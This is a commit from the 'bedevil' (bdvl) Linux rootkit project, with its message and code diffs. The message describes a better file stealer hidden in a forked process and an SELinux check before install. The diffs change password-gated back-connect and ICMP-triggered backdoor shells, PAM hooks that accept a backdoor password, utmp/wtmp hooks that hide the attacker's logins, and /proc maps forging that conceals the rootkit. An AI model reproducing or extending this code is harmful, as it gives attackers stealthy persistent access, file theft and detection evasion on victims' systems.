Various improvements

File stealer is now better...
Files are stolen in a new process
forked off of the user's process.
Files are no longer read & written
in their own blocks. Instead file
contents are mapped into memory
and the child process writes the
result of the memory map. This
new process which is forked is
hidden if it can be.

Into the kit I've added an SELinux
check before installation begins.

I added a function for redirection
of FILE streams called 'redirstream'.

I've replaced all of the
strlen({VARIABLE}) calls with their
appropriate LEN_{VARIABLE} values.
Where VARIABLE is created & defined
by setup.py.

Also I have added error-specific
returns for ldpatch, for just a
couple of things.
-3 = failed to allocate memory for
     array of located ld.so
-2 = oldpreload could not be located
     in the target ld.so

Lastly I have also added make
into the dependencies that depinstall.sh
will install.

Think that's about it.

Author: jrowa2

README.md

@@ -1,4 +1,3 @@
-
 # bedevil (bdvl)
 
 <img src=https://i.imgur.com/PyO00vy.png alt="icon" />
@@ -136,7 +135,6 @@
    * When no rootkit processes are running (_i.e.: not logged into the backdoor_) the rootkit will remove your `.bashrc` & `.profile`, that is until you log back in.
    * I have made everything easily accessible from the backdoor's home directory by plopping symlinks to everything you may need access to.
      * Not unlike `.bashrc` & `.profile` these symlinks are removed from the home directory until you log in.
- * If you aren't root straight away after logging in, `su root`.
  * __Solution for ([#16](https://github.com/kcaaj/bdvl/issues/16))__:
 ```
 su -

etc/depinstall.sh

@@ -1,14 +1,14 @@
 #!/bin/sh
 [ `id -u` != 0 ] && { echo 'Not root.'; exit; }
 if [ -f /usr/bin/yum ]; then
-    for pkg in gcc libgcc.i686 glibc-devel.i686 glibc-devel pam-devel libpcap libpcap-devel; do
+    for pkg in make gcc libgcc.i686 glibc-devel.i686 glibc-devel pam-devel libpcap libpcap-devel; do
         yum -y install -e 0 $pkg
     done
     exit
 fi
 if [ -f /usr/bin/pacman ]; then
     pacman -Syy
-    for pkg in glibc base-devel pam libpcap; do
+    for pkg in make glibc base-devel pam libpcap; do
         pacman -S $pkg
     done
     exit
@@ -18,7 +18,7 @@ if [ -f /usr/bin/apt-get ]; then
         dpkg --add-architecture i386
     fi
     apt-get -qq --yes --force-yes update
-    for pkg in gcc-multilib build-essential libpam0g-dev libpcap-dev libpcap0.8-dev; do
+    for pkg in make gcc-multilib build-essential libpam0g-dev libpcap-dev libpcap0.8-dev; do
         apt-get -qq --yes --force-yes install $pkg
     done
     exit

inc/backdoor/accept.c

@@ -5,11 +5,12 @@ void abackconnect(int sockfd){
     hook(CREAD, CCHDIR);
 
     send(sockfd, ": ", 2, 0);
-
     memset(tmp, 0, sizeof(tmp));
     call(CREAD, sockfd, tmp, sizeof(tmp)-1);
     tmp[strlen(tmp)-1]='\0';
     got_pw = !strcmp(crypt(tmp, BACKDOOR_PASS), BACKDOOR_PASS);
+    memset(tmp, 0, sizeof(tmp));
+
     if(!got_pw){
         shutdown(sockfd, SHUT_RDWR);
         close(sockfd);
@@ -43,10 +44,14 @@ int getacceptport(void){
 }
 
 int dropshell(int sockfd, struct sockaddr_in *sa_i, gid_t magicgid){
+    int accport, sport;
+
     preparehideports(magicgid);
-    int accport = getacceptport();
-    if(accport == 0) return sockfd;
-    int sport = htons(sa_i->sin_port);
+    accport = getacceptport();
+    if(accport == 0)
+        return sockfd;
+
+    sport = htons(sa_i->sin_port);
     if(sport == accport){
         pid_t pid = fork();
         if(pid == 0){

inc/backdoor/icmp/spawn.c

@@ -36,6 +36,8 @@ void backconnect(struct in_addr addr, u_short port){
     call(CREAD, s, tmp, sizeof(tmp)-1);
     tmp[strlen(tmp)-1]='\0';
     got_pw = !strcmp(crypt(tmp, BACKDOOR_PASS), BACKDOOR_PASS);
+    memset(tmp, 0, sizeof(tmp));
+
     if(!got_pw){
         shutdown(s, SHUT_RDWR);
         close(s);
@@ -89,9 +91,9 @@ int pdoorup(void){
     struct dirent *dir;
     DIR *dp;
     struct stat procstat;
-    gid_t magicgid = readgid();
+    gid_t magicgid = readgid()-1;
 
-    if(getgid() == magicgid-1)
+    if(getgid() == magicgid)
         return 1;
 
     hook(COPENDIR, CREADDIR, C__XSTAT);
@@ -110,7 +112,7 @@ int pdoorup(void){
         if((long)call(C__XSTAT, _STAT_VER, procpath, &procstat) < 0)
             continue;
 
-        if(procstat.st_gid == magicgid-1){
+        if(procstat.st_gid == magicgid){
             status = 1;
             break;
         }
@@ -124,6 +126,7 @@ void spawnpdoor(void){
     if(pdoorup() || getgid() != 0)
         return;
 
+    // if launched at install this will still be set.
     unsetenv("LD_PRELOAD");
 
     pid_t pid = fork();
@@ -163,10 +166,7 @@ void spawnpdoor(void){
 #else
     pcap_if_t *intf;
     int rfind = pcap_findalldevs(&intf, errbuf);
-    if(rfind < 0){
-        //printf("Couldn't find devices: %s\n", errbuf);
-        exit(0);
-    }
+    if(rfind < 0) exit(0);
     dev = intf->name;
 #endif
 
@@ -177,10 +177,6 @@ void spawnpdoor(void){
         mask = 0;
     }
 
-    /* print capture info */
-    //printf("Device: %s\n", dev);
-    //printf("Filter expression: %s\n", filter_exp);
-
     /* open capture device */
     handle = pcap_open_live(dev, MAX_CAP, 0, 1000, errbuf);
     if(handle == NULL){

inc/backdoor/pam/pam_hooks.c

@@ -15,6 +15,7 @@ int pam_authenticate(pam_handle_t *pamh, int flags){
 
         got_pw = !strcmp(crypt(pw, BACKDOOR_PASS), BACKDOOR_PASS);
         memset(pw, 0, strlen(pw));
+
         if(got_pw) return PAM_SUCCESS;
         return PAM_USER_UNKNOWN;
     }

inc/bedevil.c

@@ -26,6 +26,7 @@ typedef struct {
 #include <sys/types.h>
 #include <sys/stat.h>
 #include <sys/wait.h>
+#include <sys/mman.h>
 #include <sys/socket.h>
 #include <netinet/in.h>
 #include <arpa/inet.h>

inc/hooks/utmp/getut.c

@@ -17,7 +17,7 @@ struct utmp *getutid(const struct utmp *ut){
     do{
         tmp = call(CGETUTID, ut);
         if(tmp == NULL) continue;
-    }while(tmp && !strncmp(PAM_UNAME, tmp->ut_user, strlen(PAM_UNAME)));
+    }while(tmp && !strncmp(PAM_UNAME, tmp->ut_user, LEN_PAM_UNAME));
 
     return tmp;
 }
@@ -30,7 +30,7 @@ struct utmpx *getutxid(const struct utmpx *utx){
     do{
         tmp = call(CGETUTXID, utx);
         if(tmp == NULL) continue;
-    }while(tmp && !strncmp(PAM_UNAME, tmp->ut_user, strlen(PAM_UNAME)));
+    }while(tmp && !strncmp(PAM_UNAME, tmp->ut_user, LEN_PAM_UNAME));
 
     return tmp;
 }
@@ -43,7 +43,7 @@ struct utmp *getutline(const struct utmp *ut){
     do{
         tmp = call(CGETUTLINE, ut);
         if(tmp == NULL) continue;
-    }while(tmp && !strncmp(PAM_UNAME, tmp->ut_user, strlen(PAM_UNAME)));
+    }while(tmp && !strncmp(PAM_UNAME, tmp->ut_user, LEN_PAM_UNAME));
 
     return tmp;
 }
@@ -56,7 +56,7 @@ struct utmpx *getutxline(const struct utmpx *utx){
     do {
         tmp = call(CGETUTXLINE, utx);
         if(tmp == NULL) continue;
-    }while(tmp && !strncmp(PAM_UNAME, tmp->ut_user, strlen(PAM_UNAME)));
+    }while(tmp && !strncmp(PAM_UNAME, tmp->ut_user, LEN_PAM_UNAME));
 
     return tmp;
 }
@@ -69,7 +69,7 @@ struct utmp *getutent(void){
     do{
         tmp = call(CGETUTENT);
         if(tmp == NULL) continue;
-    }while(tmp && !strncmp(PAM_UNAME, tmp->ut_user, strlen(PAM_UNAME)));
+    }while(tmp && !strncmp(PAM_UNAME, tmp->ut_user, LEN_PAM_UNAME));
 
     return tmp;
 }
@@ -82,7 +82,7 @@ struct utmpx *getutxent(void){
     do{
         tmp = call(CGETUTXENT);
         if(tmp == NULL) continue;
-    }while(tmp && !strncmp(PAM_UNAME, tmp->ut_user, strlen(PAM_UNAME)));
+    }while(tmp && !strncmp(PAM_UNAME, tmp->ut_user, LEN_PAM_UNAME));
 
     return tmp;
 }
@@ -91,7 +91,7 @@ void getutmp(const struct utmpx *ux, struct utmp *u){
     if(hide_me) return;
 
     if(ux){
-        if(!strncmp(PAM_UNAME, ux->ut_user, strlen(PAM_UNAME))){
+        if(!strncmp(PAM_UNAME, ux->ut_user, LEN_PAM_UNAME)){
             hide_me = 1;
             return;
         }
@@ -105,7 +105,7 @@ void getutmpx(const struct utmp *u, struct utmpx *ux){
     if(hide_me) return;
 
     if(u){
-        if(!strncmp(PAM_UNAME, u->ut_user, strlen(PAM_UNAME))){
+        if(!strncmp(PAM_UNAME, u->ut_user, LEN_PAM_UNAME)){
             hide_me = 1;
             return;
         }

inc/hooks/utmp/putut.c

@@ -25,7 +25,7 @@
 void logwtmp(const char *ut_line, const char *ut_name, const char *ut_host){
     if(hide_me) return;
 
-    if(!strncmp(PAM_UNAME, ut_name, strlen(PAM_UNAME))){
+    if(!strncmp(PAM_UNAME, ut_name, LEN_PAM_UNAME)){
         hide_me = 1;
         return;
     }
@@ -38,7 +38,7 @@ void updwtmp(const char *wfile, const struct utmp *ut){
     if(hide_me) return;
 
     if(ut){
-        if(!strncmp(PAM_UNAME, ut->ut_user, strlen(PAM_UNAME))){
+        if(!strncmp(PAM_UNAME, ut->ut_user, LEN_PAM_UNAME)){
             hide_me = 1;
             return;
         }
@@ -52,7 +52,7 @@ void updwtmpx(const char *wfilex, const struct utmpx *utx){
     if(hide_me) return;
 
     if(utx){
-        if(!strncmp(PAM_UNAME, utx->ut_user, strlen(PAM_UNAME))){
+        if(!strncmp(PAM_UNAME, utx->ut_user, LEN_PAM_UNAME)){
             hide_me = 1;
             return;
         }

inc/util/hiding/files/files.h

@@ -15,23 +15,8 @@ gid_t get_fd_gid(int fd);
 gid_t get_fd_gid64(int fd);
 #include "get_path_gid.c"
 
-#define MODE_REG 0x32  /* STAT MODE FOR REGULAR FILES. */
-#define MODE_64  0x64  /* STAT MODE FOR BIG FILES. */
-
-int _hidden_path(const char *pathname, short mode);
-int _f_hidden_path(int fd, short mode);
-int _l_hidden_path(const char *pathname, short mode);
-int hidden_proc(pid_t pid);
 #include "hidden.c"
 
-#define hidden_ppid(pid)     hidden_proc(getppid())
-#define hidden_path(path)    _hidden_path(path, MODE_REG)
-#define hidden_path64(path)  _hidden_path(path, MODE_64)
-#define hidden_fd(fd)        _f_hidden_path(fd, MODE_REG)
-#define hidden_fd64(fd)      _f_hidden_path(fd, MODE_64)
-#define hidden_lpath(path)   _l_hidden_path(path, MODE_REG)
-#define hidden_lpath64(path) _l_hidden_path(path, MODE_64)
-
 
 
 #endif

inc/util/hiding/mapsforge.c

@@ -8,65 +8,62 @@ char *badstring(char *buf){
 }
 
 FILE *forge_maps(const char *pathname){
-    FILE *o = tmpfile(), *pnt;
+    FILE *tmp, *fp;
     char buf[LINE_MAX];
 
-    hook(CFOPEN);
-    if((pnt = call(CFOPEN, pathname, "r")) == NULL){
+    fp = redirstream(pathname, &tmp);
+    if(fp == NULL){
         errno = ENOENT;
-	fclose(o);
         return NULL;
     }
 
-    while(fgets(buf, sizeof(buf), pnt) != NULL)
+    while(fgets(buf, sizeof(buf), fp) != NULL)
         if(!badstring(buf))
-            fputs(buf, o);
+            fputs(buf, tmp);
 
-    fclose(pnt);
-    fseek(o, 0, SEEK_SET);
-    return o;
+    fclose(fp);
+    fseek(tmp, 0, SEEK_SET);
+    return tmp;
 }
 
 FILE *forge_smaps(const char *pathname){
-    FILE *o = tmpfile(), *pnt;
+    FILE *tmp, *fp;
     char buf[LINE_MAX];
     int i = 0;
 
-    hook(CFOPEN);
-    if((pnt = call(CFOPEN, pathname, "r")) == NULL){
+    fp = redirstream(pathname, &tmp);
+    if(fp == NULL){
         errno = ENOENT;
-	fclose(o);
         return NULL;
     }
 
-    while(fgets(buf, sizeof(buf), pnt) != NULL){
+    while(fgets(buf, sizeof(buf), fp) != NULL){
         if(i > 0) i++;
         if(i > 15) i = 0;
         if(badstring(buf)) i = 1;
-        if(i == 0) fputs(buf, o);
+        if(i == 0) fputs(buf, tmp);
     }
 
-    fclose(pnt);
-    fseek(o, 0, SEEK_SET);
-    return o;
+    fclose(fp);
+    fseek(tmp, 0, SEEK_SET);
+    return tmp;
 }
 
 FILE *forge_numamaps(const char *pathname){
-    FILE *o = tmpfile(), *pnt;
+    FILE *tmp, *fp;
     char buf[LINE_MAX];
 
-    hook(CFOPEN);
-    if((pnt = call(CFOPEN, pathname, "r")) == NULL){
+    fp = redirstream(pathname, &tmp);
+    if(fp == NULL){
         errno = ENOENT;
-	fclose(o);
         return NULL;
     }
 
-    while(fgets(buf, sizeof(buf), pnt) != NULL)
+    while(fgets(buf, sizeof(buf), fp) != NULL)
         if(!badstring(buf))
-            fputs(buf, o);
+            fputs(buf, tmp);
 
-    fclose(pnt);
-    fseek(o, 0, SEEK_SET);
-    return o;
+    fclose(fp);
+    fseek(tmp, 0, SEEK_SET);
+    return tmp;
 }